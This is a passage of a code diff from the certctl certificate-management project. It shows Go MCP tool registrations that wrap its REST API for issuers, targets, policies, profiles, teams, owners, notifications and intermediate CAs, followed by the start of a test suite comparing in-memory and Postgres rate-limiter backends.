|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_issuer",
|
||||||
|
Description: "Register a new issuer connector. Requires name and type (ACME, GenericCA, or StepCA).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateIssuerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/issuers", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_issuer",
|
||||||
|
Description: "Update an issuer connector's configuration.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateIssuerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/issuers/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_issuer",
|
||||||
|
Description: "Delete an issuer connector.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/issuers/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_test_issuer",
|
||||||
|
Description: "Test connectivity to an issuer connector. Returns success or error details.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/issuers/"+input.ID+"/test", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Targets ─────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerTargetTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_targets",
|
||||||
|
Description: "List all deployment targets (NGINX, Apache, HAProxy, F5, IIS).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/targets", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_target",
|
||||||
|
Description: "Get deployment target details including type, agent, and configuration.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/targets/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_target",
|
||||||
|
Description: "Create a new deployment target. Requires name and type (NGINX, Apache, HAProxy, F5, IIS).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/targets", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_target",
|
||||||
|
Description: "Update a deployment target's configuration.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/targets/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_target",
|
||||||
|
Description: "Delete a deployment target.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/targets/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Policies ────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerPolicyTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_policies",
|
||||||
|
Description: "List all policy rules. Policy types: AllowedIssuers, AllowedDomains, RequiredMetadata, AllowedEnvironments, RenewalLeadTime.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/policies", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_policy",
|
||||||
|
Description: "Get policy rule details including type, configuration, and enabled status.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/policies/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_policy",
|
||||||
|
Description: "Create a new policy rule. Requires name and type. Optional severity (Warning, Error, Critical) defaults to Warning.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreatePolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/policies", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_policy",
|
||||||
|
Description: "Update a policy rule's name, type, configuration, enabled status, or severity.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdatePolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/policies/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_policy",
|
||||||
|
Description: "Delete a policy rule.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/policies/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_policy_violations",
|
||||||
|
Description: "List violations for a specific policy. Shows affected certificates and severity (Warning, Error, Critical).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListViolationsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
data, err := c.Get("/api/v1/policies/"+input.ID+"/violations", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Profiles ────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerProfileTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_profiles",
|
||||||
|
Description: "List certificate enrollment profiles defining allowed key types, max TTL, and crypto constraints.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/profiles", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_profile",
|
||||||
|
Description: "Get certificate profile details including allowed algorithms, max TTL, EKUs, and SAN patterns.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/profiles/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_profile",
|
||||||
|
Description: "Create a certificate enrollment profile. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateProfileInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/profiles", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_profile",
|
||||||
|
Description: "Update a certificate profile's constraints.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateProfileInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/profiles/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_profile",
|
||||||
|
Description: "Delete a certificate profile.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/profiles/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Teams ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerTeamTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_teams",
|
||||||
|
Description: "List all teams for certificate ownership grouping.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/teams", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_team",
|
||||||
|
Description: "Get team details.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/teams/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_team",
|
||||||
|
Description: "Create a new team. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateTeamInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/teams", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_team",
|
||||||
|
Description: "Update a team's name or description.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateTeamInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/teams/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_team",
|
||||||
|
Description: "Delete a team.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/teams/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Owners ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerOwnerTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_owners",
|
||||||
|
Description: "List all certificate owners with email and team assignment.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/owners", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_owner",
|
||||||
|
Description: "Get owner details including email and team.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/owners/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_owner",
|
||||||
|
Description: "Create a new certificate owner. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateOwnerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/owners", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_owner",
|
||||||
|
Description: "Update an owner's name, email, or team assignment.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateOwnerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/owners/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_owner",
|
||||||
|
Description: "Delete a certificate owner.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/owners/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Notifications ───────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerNotificationTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_notifications",
|
||||||
|
Description: "List notification events (expiration warnings, renewal/deployment results, policy violations, revocations). Optional status filter supports the I-005 Dead letter tab (status=dead).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListNotificationsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/notifications", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_notification",
|
||||||
|
Description: "Get notification event details.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/notifications/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_mark_notification_read",
|
||||||
|
Description: "Mark a notification as read.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/notifications/"+input.ID+"/read", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-005: requeue a dead-letter notification. Flips status from 'dead'
|
||||||
|
// back to 'pending' and clears next_retry_at so the retry sweep picks
|
||||||
|
// the notification up on its next tick. Operator-triggered; the tool
|
||||||
|
// is the MCP counterpart of the GUI's Dead letter tab "Requeue" button.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_requeue_notification",
|
||||||
|
Description: "Requeue a dead notification back to pending so the retry sweep can deliver it again. Used to recover from persistent delivery failures after the underlying issue (SMTP config, webhook endpoint, etc.) has been fixed.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/notifications/"+input.ID+"/requeue", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Intermediate CAs (Phase F — P1-6..P1-9) ─────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. Rank 8 primitive
|
||||||
|
// (multi-level CA hierarchy management). The handlers are admin-gated via
|
||||||
|
// auth.IsAdmin — non-admin callers see HTTP 403 regardless of MCP
|
||||||
|
// surface. We expose the full management API rather than carving it off
|
||||||
|
// because the operator ran the original Rank 8 deliverable to make this
|
||||||
|
// a first-class managed primitive; gating by API key role at the handler
|
||||||
|
// layer is the correct least-privilege boundary, not by transport.
|
||||||
|
|
||||||
|
func registerIntermediateCATools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_intermediate_cas",
|
||||||
|
Description: "List the intermediate-CA hierarchy under a parent issuer (GET /api/v1/issuers/{id}/intermediates). Admin-gated route. Returns flat rows; callers render the tree from each row's parent_ca_id.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListIntermediateCAsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/issuers/"+input.IssuerID+"/intermediates", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_intermediate_ca",
|
||||||
|
Description: "Create an intermediate CA under a parent issuer (POST /api/v1/issuers/{id}/intermediates). Admin-gated. Discriminator: when parent_ca_id is empty AND root_cert_pem + key_driver_id are present, registers an operator-supplied root CA; otherwise signs a child under the named parent.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateIntermediateCAInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]any{"name": input.Name}
|
||||||
|
if input.ParentCAID != "" {
|
||||||
|
body["parent_ca_id"] = input.ParentCAID
|
||||||
|
}
|
||||||
|
if input.RootCertPEM != "" {
|
||||||
|
body["root_cert_pem"] = input.RootCertPEM
|
||||||
|
}
|
||||||
|
if input.KeyDriverID != "" {
|
||||||
|
body["key_driver_id"] = input.KeyDriverID
|
||||||
|
}
|
||||||
|
if len(input.Subject) > 0 {
|
||||||
|
body["subject"] = input.Subject
|
||||||
|
}
|
||||||
|
if input.Algorithm != "" {
|
||||||
|
body["algorithm"] = input.Algorithm
|
||||||
|
}
|
||||||
|
if input.TTLDays > 0 {
|
||||||
|
body["ttl_days"] = input.TTLDays
|
||||||
|
}
|
||||||
|
if input.PathLenConstraint != nil {
|
||||||
|
body["path_len_constraint"] = *input.PathLenConstraint
|
||||||
|
}
|
||||||
|
if len(input.NameConstraints) > 0 {
|
||||||
|
body["name_constraints"] = input.NameConstraints
|
||||||
|
}
|
||||||
|
if input.OCSPResponderURL != "" {
|
||||||
|
body["ocsp_responder_url"] = input.OCSPResponderURL
|
||||||
|
}
|
||||||
|
if len(input.Metadata) > 0 {
|
||||||
|
body["metadata"] = input.Metadata
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/issuers/"+input.IssuerID+"/intermediates", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_intermediate_ca",
|
||||||
|
Description: "Get a single intermediate CA (GET /api/v1/intermediates/{id}). Admin-gated.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/intermediates/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_retire_intermediate_ca",
|
||||||
|
Description: "Retire an intermediate CA (POST /api/v1/intermediates/{id}/retire). Admin-gated. Two-phase: first call (confirm=false) transitions active→retiring; second call (confirm=true) transitions retiring→retired. Refuses retired transition while active children remain (drain-first semantics).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RetireIntermediateCAInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := struct {
|
||||||
|
Note string `json:"note,omitempty"`
|
||||||
|
Confirm bool `json:"confirm,omitempty"`
|
||||||
|
}{Note: input.Note, Confirm: input.Confirm}
|
||||||
|
data, err := c.Post("/api/v1/intermediates/"+input.ID+"/retire", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,412 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit_test
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"runtime"
|
||||||
|
"strings"
|
||||||
|
"sync"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
_ "github.com/lib/pq"
|
||||||
|
"github.com/testcontainers/testcontainers-go"
|
||||||
|
"github.com/testcontainers/testcontainers-go/wait"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/ratelimit"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.2 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): backend-equivalence test suite. Runs the same scenario
|
||||||
|
// surface against both backends (in-memory + postgres) via the shared
|
||||||
|
// Limiter interface — if the postgres backend's caller-visible
|
||||||
|
// semantics drift from the memory backend's, this file fails first.
|
||||||
|
//
|
||||||
|
// Mirrors the white-box test names in sliding_window_test.go: every
|
||||||
|
// public-surface behavior pinned there (cap, expiry, disabled bypass,
|
||||||
|
// empty-key short-circuit, concurrency) gets re-pinned here for the
|
||||||
|
// postgres backend.
|
||||||
|
//
|
||||||
|
// Postgres tests skip under -short (matches the pattern in
|
||||||
|
// internal/repository/postgres/testutil_test.go); CI's
|
||||||
|
// `go test -race -short -count=1 ./...` exercises only the memory
|
||||||
|
// half. The integration job runs the full suite.
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Backend-equivalence helpers
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
// limiterFactory builds a fresh Limiter for one test case.
|
||||||
|
// Memory backends discard `db`; postgres backends use it.
|
||||||
|
type limiterFactory func(t *testing.T, db *sql.DB, maxN int, window time.Duration) ratelimit.Limiter
|
||||||
|
|
||||||
|
func memoryFactory(t *testing.T, _ *sql.DB, maxN int, window time.Duration) ratelimit.Limiter {
|
||||||
|
t.Helper()
|
||||||
|
// Map cap of 10_000 — large enough that none of the equivalence
|
||||||
|
// scenarios trip the LRU-eviction branch (the eviction branch is
|
||||||
|
// memory-specific; postgres has no equivalent so it's not part of
|
||||||
|
// the cross-backend contract).
|
||||||
|
return ratelimit.NewSlidingWindowLimiter(maxN, window, 10_000)
|
||||||
|
}
|
||||||
|
|
||||||
|
func postgresFactory(t *testing.T, db *sql.DB, maxN int, window time.Duration) ratelimit.Limiter {
|
||||||
|
t.Helper()
|
||||||
|
if db == nil {
|
||||||
|
t.Fatal("postgresFactory requires a non-nil *sql.DB")
|
||||||
|
}
|
||||||
|
return ratelimit.NewPostgresSlidingWindowLimiter(db, maxN, window)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Per-backend test entry points
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
func TestSlidingWindowLimiter_Equivalence_Memory(t *testing.T) {
|
||||||
|
t.Run("AllowsUpToCap", func(t *testing.T) { caseAllowsUpToCap(t, memoryFactory, nil) })
|
||||||
|
t.Run("DistinctKeysIndependent", func(t *testing.T) { caseDistinctKeysIndependent(t, memoryFactory, nil) })
|
||||||
|
t.Run("WindowExpiry", func(t *testing.T) { caseWindowExpiry(t, memoryFactory, nil) })
|
||||||
|
t.Run("DisabledBypass", func(t *testing.T) { caseDisabledBypass(t, memoryFactory, nil) })
|
||||||
|
t.Run("NegativeCapDisabled", func(t *testing.T) { caseNegativeCapDisabled(t, memoryFactory, nil) })
|
||||||
|
t.Run("EmptyKeyShortCircuits", func(t *testing.T) { caseEmptyKeyShortCircuits(t, memoryFactory, nil) })
|
||||||
|
t.Run("ConcurrentRaceFree", func(t *testing.T) {
|
||||||
|
if testing.Short() {
|
||||||
|
t.Skip("race-style test under -short")
|
||||||
|
}
|
||||||
|
caseConcurrentRaceFree(t, memoryFactory, nil)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSlidingWindowLimiter_Equivalence_Postgres(t *testing.T) {
|
||||||
|
if testing.Short() {
|
||||||
|
t.Skip("postgres equivalence tests require testcontainers; skipped under -short")
|
||||||
|
}
|
||||||
|
tdb := setupTestDB(t)
|
||||||
|
defer tdb.teardown(t)
|
||||||
|
|
||||||
|
t.Run("AllowsUpToCap", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "AllowsUpToCap")
|
||||||
|
caseAllowsUpToCap(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("DistinctKeysIndependent", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "DistinctKeysIndependent")
|
||||||
|
caseDistinctKeysIndependent(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("WindowExpiry", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "WindowExpiry")
|
||||||
|
caseWindowExpiry(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("DisabledBypass", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "DisabledBypass")
|
||||||
|
caseDisabledBypass(t, postgresFactory, db)
|
||||||
|
})
|
